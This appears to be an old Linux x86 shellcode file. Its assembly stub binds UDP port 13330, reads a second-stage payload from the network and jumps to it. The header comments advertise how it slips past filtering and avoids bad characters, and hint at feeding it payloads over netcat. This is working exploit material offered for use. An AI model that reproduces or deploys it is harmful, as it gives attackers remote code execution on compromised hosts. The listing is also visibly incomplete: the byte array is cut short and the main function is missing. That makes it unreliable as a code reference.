Linux x86 UDP shellcode. Reads from UDP port 13330 to retrieve other shellcode then executes it.
** Linux/x86 udp + read + exec shellcode (c) gunzip
** reads from udp port 13330 another shellcode then executes it
** 1. Udp is usually not filtered
** 2. You can send very big shellcode (size <= 65535)
** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
** 4. Your sent shellcodes can contain any char ( 0x00 too )
** 5 You can send a whole shell script to execute with a command code
** 6. Does not contain CR, LF, spaces, slashes and so on
** 7. No need to search for file descriptors
** gunzip@ircnet <>
** If you can't figure it out how to use this you don't need this..
** hint: try with puts( shellcode ) and pipe netcat -u host
** HaPPy BiRtHdAy tankie !!! :-]
void udp_exec()
/* fd = socket( AF_INET, SOCK_DGRAM, 0 ) */
xorl %eax, %eax
xorl %ebx, %ebx
incl %ebx # socket()
pushl %eax # IPPROTO_IP
pushl $0x2 # SOCK_DGRAM
pushl $0x2 # AF_INET
movl %esp, %ecx
movb $0x66, %al # SYS_socketcall
int $0x80
/* bind(s, (struct sockaddr *)&sa, sizeof(sa)) */
decl %ebx # ebx = 0x0
pushl %ebx # PAD
pushl %ebx # PAD
pushl %ebx # INADDR_ANY
pushw $0x1234 # PORT (13330)
pushw $0x2 # ADDRESS FAMILY
movl %esp, %ecx
pushl $0x16 # sizeof(struct sockaddr)
pushl %ecx # pointer to struct sockaddr
pushl %eax # socket file descriptor
movl %esp, %ecx # SYS_socketcall * args
movb $0x2, %bl # SYS_socketcall bind()
push $0x66 # SYS_socketcall
popl %eax
int $0x80
/* read( s, buf, 0xffff ); jmp *buf */
movl (%esp), %ebx # socket fd
cltd # on bind success eax = 0x0
movw $0xffff,%dx # len = 65535
subl %edx, %esp # reserves space
movl %esp, %ecx # where to read
movb $0x03, %al # SYS_read
int $0x80
jmp *%ecx
#define PORT "\x34\x12"
char shellcode[]=
"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
void (*f)() = (void *)&shellcode;
printf("\n[+] Udp read shellcode by gunzip, len = %d\n", strlen(shellcode));